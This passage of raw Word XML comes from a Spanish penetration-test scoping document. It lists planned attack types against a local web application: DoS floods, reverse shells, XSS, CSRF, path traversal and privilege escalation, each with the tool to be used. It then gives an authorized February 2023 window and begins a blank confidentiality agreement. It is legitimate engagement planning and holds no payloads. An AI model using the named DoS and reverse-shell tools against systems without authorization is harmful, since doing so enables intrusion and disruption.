        <w:p w14:paraId="02897F90" w14:textId="71815828" w:rsidR="00D32284" w:rsidRPr="00A37E0C" w:rsidRDefault="00A37E0C" w:rsidP="00A37E0C">
          <w:r>
            <w:tab/>
          </w:r>
          <w:r w:rsidR="00D20135">
            <w:tab/>
          </w:r>
        </w:p>
        <w:p w14:paraId="54DC705C" w14:textId="5ACCE384" w:rsidR="00D32284" w:rsidRDefault="00D32284" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="01412157" w14:textId="67F33D64" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="8" w:name="_Toc128034130"/>
          <w:r>
            <w:t>Tipos de pruebas</w:t>
          </w:r>
          <w:bookmarkEnd w:id="8"/>
        </w:p>
        <w:p w14:paraId="798704B5" w14:textId="77777777" w:rsidR="00D32284" w:rsidRPr="00D32284" w:rsidRDefault="00D32284" w:rsidP="00D32284"/>
        <w:p w14:paraId="5C65C812" w14:textId="7A2BBBED" w:rsidR="00406981" w:rsidRDefault="00E95B5E" w:rsidP="00D32284">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>A la versión local</w:t>
          </w:r>
          <w:r w:rsidR="00D32284">
            <w:t xml:space="preserve"> de la página web no podrá pasar ningún tipo de problema en forma de efectos colaterales.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="62502875" w14:textId="7C532E47" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>La prueba de intrusión externo: se realizará desde la misma red sobre la infraestructura de la máquina, sobre todo dispositivo expuesto a internet, en este caso la máquina y la página web.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7B2474E9" w14:textId="1CF447F2" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>En este caso se realizará una prueba de caja gris, en donde tendré información parcial de la aplicación web proporcionado por la empresa.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6278C0BD" w14:textId="7289F524" w:rsidR="00E542A3" w:rsidRDefault="00E542A3">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Se realizará escáner de vulnerabilidades con Acunetix, Burp Suite, ZAP, SkipFish.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="57C3347C" w14:textId="77777777" w:rsidR="00E542A3" w:rsidRDefault="00E542A3">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Reconocimiento de red con nmap, Netdiscover, red Reconnoitre.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3E27B337" w14:textId="303E3D88" w:rsidR="00E542A3" w:rsidRDefault="00E542A3">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ataque DoS</w:t>
          </w:r>
          <w:r w:rsidR="00C744DA">
            <w:t xml:space="preserve"> HTTP flood, con Golang-httpflood y PyFlooder.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="25B4D489" w14:textId="0082F540" w:rsidR="00E542A3" w:rsidRDefault="00E542A3">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Generación de Shell reversas, unos de JSshell para Shell reversa en JavaScript.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="36CF20D1" w14:textId="53B02C23" w:rsidR="00E542A3" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>XXS.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="289A129C" w14:textId="406F7113" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>File Upload XSS.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0E51C9DC" w14:textId="00E18B2B" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Xtored XSS.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="67A4A0CC" w14:textId="5922A98F" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>XSS reflejado.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="21CFA90B" w14:textId="74187A96" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Elevación de privilegios.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6A23BBC2" w14:textId="7F402853" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Manipulación de cookies.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5B57F103" w14:textId="4084EFF0" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>CSFR</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="46F5ACA5" w14:textId="5D8DD81F" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Path transversal.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="25A90B8F" w14:textId="3CFCC3DE" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>DoS.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="47F2F6FC" w14:textId="3EA3628E" w:rsidR="00023E0C" w:rsidRDefault="00023E0C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Uso Shellereator, para generar shells.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7BBB33F3" w14:textId="235E09D3" w:rsidR="007E6DBA" w:rsidRDefault="007E6DBA" w:rsidP="007E6DBA">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1656C29A" w14:textId="19745475" w:rsidR="00D32284" w:rsidRDefault="00D32284" w:rsidP="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1ED8BD0F" w14:textId="3A513C8A" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="9" w:name="_Toc128034131"/>
          <w:r>
            <w:t>Restricciones y conformidades</w:t>
          </w:r>
          <w:bookmarkEnd w:id="9"/>
        </w:p>
        <w:p w14:paraId="598C4596" w14:textId="139F1B25" w:rsidR="00D32284" w:rsidRDefault="00D32284" w:rsidP="00D32284">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="59E10FB7" w14:textId="4CF06ECF" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Restricciones:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0DF8E560" w14:textId="4E5BB414" w:rsidR="00D32284" w:rsidRDefault="000E194E" w:rsidP="00D32284">
          <w:pPr>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Está</w:t>
          </w:r>
          <w:r w:rsidR="00D32284">
            <w:t xml:space="preserve"> autorizado un periodo de prueba que abarca desde el 1 de febrero de 2023 hasta el 28 de febrero de 2023, ambos los dos incluidos.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="60D731BE" w14:textId="3A9C2675" w:rsidR="00D32284" w:rsidRDefault="00D32284" w:rsidP="00D32284">
          <w:pPr>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="137C2794" w14:textId="73AF0083" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>De conformidad con la concesión de esta autorización el cliente declara:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1BB3A8B0" w14:textId="565B2E98" w:rsidR="00D32284" w:rsidRDefault="00D32284" w:rsidP="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="03176214" w14:textId="403F5654" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>El cliente dueño de los sistemas donde se realiza la auditoria de vulnerabilidades y el suscrito tiene la autoridad adecuada para llevar a cabo las actividades de verificación de la seguridad de la aplicación.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="58DF9F11" w14:textId="225C6F91" w:rsidR="00D32284" w:rsidRDefault="00D32284">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>El cliente ha creado una copia de seguridad completa de todos los sistemas dentro del ámbito de las pruebas de vulnerabilidades</w:t>
          </w:r>
          <w:r w:rsidR="00BE55FE">
            <w:t xml:space="preserve">, y se ha comprometido a que el sistema de copias de seguridad permitirá al cliente restaurar los sistemas al estado </w:t>
          </w:r>
          <w:r w:rsidR="00312E63">
            <w:t>pretest</w:t>
          </w:r>
          <w:r w:rsidR="00BE55FE">
            <w:t>, aunque en este caso se trate de una versión local de la aplicación.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="79B93287" w14:textId="2E9EFDB8" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>El servicio implica el uso necesario de técnicas diseñadas para detectar vulnerabilidades de seguridad, y que es posible identificar y eliminar todos los riesgo del uso de estas herramientas y técnicas.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="24784AF8" w14:textId="6C230671" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Cualquier cambio en las limitaciones y condiciones descritas deberá realizarse por escrito y ser aceptado por las dos partes.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="16BB1C48" w14:textId="2338BA1E" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5248E112" w14:textId="50EF5704" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="31658CB9" w14:textId="6FE546BB" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="10" w:name="_Toc120529618"/>
          <w:bookmarkStart w:id="11" w:name="_Toc128034132"/>
          <w:r>
            <w:t>Acuerdo de confidencialidad</w:t>
          </w:r>
          <w:bookmarkEnd w:id="10"/>
          <w:bookmarkEnd w:id="11"/>
        </w:p>
        <w:p w14:paraId="1FD4757E" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRPr="00452F4C" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="34AC25E9" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRPr="00840B2A" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:id="12" w:name="_Toc120529619"/>
          <w:bookmarkStart w:id="13" w:name="_Toc128034133"/>
          <w:r w:rsidRPr="00840B2A">
            <w:rPr>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t>ACUERDO DE CONFIDENCIALIDAD Y SECRETO</w:t>
          </w:r>
          <w:bookmarkEnd w:id="12"/>
          <w:bookmarkEnd w:id="13"/>
        </w:p>
        <w:p w14:paraId="4B372BE4" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>En</w:t>
          </w:r>
          <w:r>
            <w:t>....................</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>a</w:t>
          </w:r>
          <w:r>
            <w:t>......</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>de</w:t>
          </w:r>
          <w:r>
            <w:t>..........</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>de 20</w:t>
          </w:r>
          <w:r>
            <w:t>.......</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1E9BB846" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:t>REUNIDOS</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="56F9253A" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>D./Dª ............................................................................, mayor de edad, con domicilio en la C/........................................................... Nº........, Localidad........................................... Provincia.......................................... C.P.............. con D.N.I......................., y en representación de la compañía……………………. con CIF……………… y domicilio social en……………………………… y,</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2F160D12" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>D./Dª ............................................................................, mayor de edad, con domicilio en la C/........................................................... Nº........, Localidad........................................... Provincia.......................................... C.P.............. con D.N.I......................., y en representación de la compañía……………………. con CIF……………… y domicilio social en……………………………… y,</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7C002DB3" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Subttulo"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:t>Exponen</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2DE614C7" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="18"/>
            </w:numPr>
            <w:suppressAutoHyphens/>
            <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>Que ambas partes se reconocen capacidad jurídica suficiente para suscribir el presente documento.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6EB7EDBB" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="18"/>
            </w:numPr>
            <w:suppressAutoHyphens/>
            <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>Que ambas partes desean iniciar una relación negocial y de colaboración mutua a nivel empresarial.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="21281E2A" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="18"/>
            </w:numPr>
            <w:suppressAutoHyphens/>
            <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>Que durante la mencionada relación las partes intercambiarán o crearán información que están interesadas en regular su confidencialidad y secreto mediante las siguientes:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1B19F538" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Subttulo"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:t>Condiciones</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4DE13584" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRPr="00840B2A" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="53CEF06E" w14:textId="3AF3B0B0" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t xml:space="preserve">Se considera información confidencial toda aquella información, ya sea técnica, financiera, comercial o de cualquier otro carácter, suministrada y divulgada por la empresa cliente a Alesander S.L </w:t>
          </w:r>
          <w:r w:rsidR="0012550A">
            <w:t>en relación con el</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> alcance del contrato, mediante cualquier tipo de soporte, tangible o intangible, actualmente conocido o que posibilite el estado de la técnica en el futuro (papel, informático) o de forma verbal</w:t>
          </w:r>
          <w:r w:rsidR="0012550A">
            <w:t>.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="44EA7FE1" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="7338C55C" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="63F84677" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="46B440BC" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="14" w:name="_Toc120529620"/>
          <w:bookmarkStart w:id="15" w:name="_Toc128034134"/>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>3.1</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>Obligaciones Alesander S.L</w:t>
          </w:r>
          <w:bookmarkEnd w:id="14"/>
          <w:bookmarkEnd w:id="15"/>
        </w:p>
        <w:p w14:paraId="0C244FA8" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRPr="00452F4C" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="68108DF6" w14:textId="231CE47D" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t xml:space="preserve">Nada más recibir la información confidencial, Alesander S.L la mantendrá en estricta confidencialidad, la utilizará solamente </w:t>
          </w:r>
          <w:r w:rsidR="00817B48">
            <w:t>en relación con</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> las pruebas de alcance, no la revelará a una tercera parte sin el previo consentimiento escrito de la empresa cliente y solo podrá revelar dicha información confidencial a los empleados de la compañía o que tengan necesidad expresa de conocerla en relación con las pruebas contratadas</w:t>
          </w:r>
          <w:r w:rsidR="0012550A">
            <w:t>.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5E22FD78" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="7F62BC08" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t>Alesander S.L no podrá copiar ni reproducir la información confidencial suministrada por la otra parte en formato o soporte alguno, excepto si ello fuera preciso con arreglo a lo previsto en el párrafo anterior. Toda copia o reproducción que se haga deberá contener el mismo sello, marca o leyenda que la original</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="09D47E23" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="37F7C8AD" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="16" w:name="_Toc120529621"/>
          <w:bookmarkStart w:id="17" w:name="_Toc128034135"/>
          <w:r>
            <w:t>3.2</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>Exclusiones</w:t>
          </w:r>
          <w:bookmarkEnd w:id="16"/>
          <w:bookmarkEnd w:id="17"/>
        </w:p>
        <w:p w14:paraId="37DA6506" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t>Las partes acuerdan que las obligaciones contenidas en este acuerdo no se aplicarán respecto a aquella información que</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5062584B" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="67E2092A" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Esté, o sea o llegue a ser público conocimiento sin mediar acto proveniente de Alesander S.L en contravención de los términos de este compromiso</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65867AE1" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7324F5C8" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Deba ser difundida por imperativo de una disposición legal, contractual o judicial</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6BF5F702" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="56120395" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Si la información es constitutiva de delito </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0C204EB6" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4E785EF4" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Sea explícitamente identificada, de conformidad con este compromiso, como información no confidencial</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7ADF9160" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6DD90ECD" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Cuya comunicación o uso sin restricciones haya sido aprobada por la empresa cliente</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B19C349" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6665A840" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:t>Sea independientemente generada por Alesander S.L sin hacer uso de información confidencial</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="64F48C32" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="14B3380D" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="17"/>
            </w:numPr>
            <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
